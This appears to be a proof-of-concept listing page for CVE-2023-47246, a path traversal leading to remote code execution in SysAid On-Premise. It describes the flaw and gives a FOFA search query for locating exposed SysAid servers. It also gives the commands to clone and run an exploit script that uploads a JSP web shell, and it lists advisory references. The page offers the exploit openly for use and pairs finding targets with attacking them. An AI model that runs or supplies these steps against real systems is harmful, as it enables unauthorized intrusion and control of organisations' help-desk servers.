CVE-2023-47246 PoC: Sysaid Technologies SysAid Security Vulnerability

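Source
Related vulnerability
Title: Sysaid Technologies SysAid Security Vulnerability (CVE-2023-47246)
Description: Sysaid Technologies SysAid is an IT service management solution from the Israeli company Sysaid Technologies. SysAid On-Premise is the locally installed edition of SysAid. Sysaid Technologies SysAid On-Premise versions before 23.3.36 contain a security vulnerability that stems from a path traversal flaw. An attacker can exploit this vulnerability to write a file to the Tomcat webroot and then execute code.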
Description
exploit for cve-2023-47246 SysAid RCE (shell upload)
Introduction
# Vulnerability Details

1. fofa:

   ```text
   body="sysaid-logo-dark-green.png" || title="SysAid Help Desk Software" || body="Help Desk software <a href=\"http://www.sysaid.com\">by SysAid</a>"
   ```

2. Affected versions: SysAid Server<23.3.36

# Vulnerability Reproduction

1. Execute the script:

   ```shell
   git clone https://github.com/W01fh4cker/CVE-2023-47246-EXP.git
   cd CVE-2023-47246-EXP
   pip install -r requirements.txt
   python CVE-2023-47246-EXP.py -u http://192.168.161.190:8443 -p http://127.0.0.1:8083 -f shell.jsp
   ```

2. result:![](https://github.com/W01fh4cker/CVE-2023-47246-EXP/assets/101872898/690d6a3c-b5ce-45bb-b37a-7d5ca72b13ab)

# Reference

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2023/CVE-2023-47246.yaml  
https://www.huntress.com/blog/critical-vulnerability-sysaid-cve-2023-47246  
https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification  
https://www.zscaler.com/blogs/security-research/coverage-advisory-cve-2023-47246-sysaid-zero-day-vulnerability

File snapshot

```text
[4.0K] /data/pocs/a108e1369e3bf04f07e696ce656652bc2570af73
├── [ 12K] CVE-2023-47246-EXP.py
├── [ 4] CVE-2023-47246.txt
├── [1.0K] README.md
└── [ 16] requirements.txt

0 directories, 4 files
```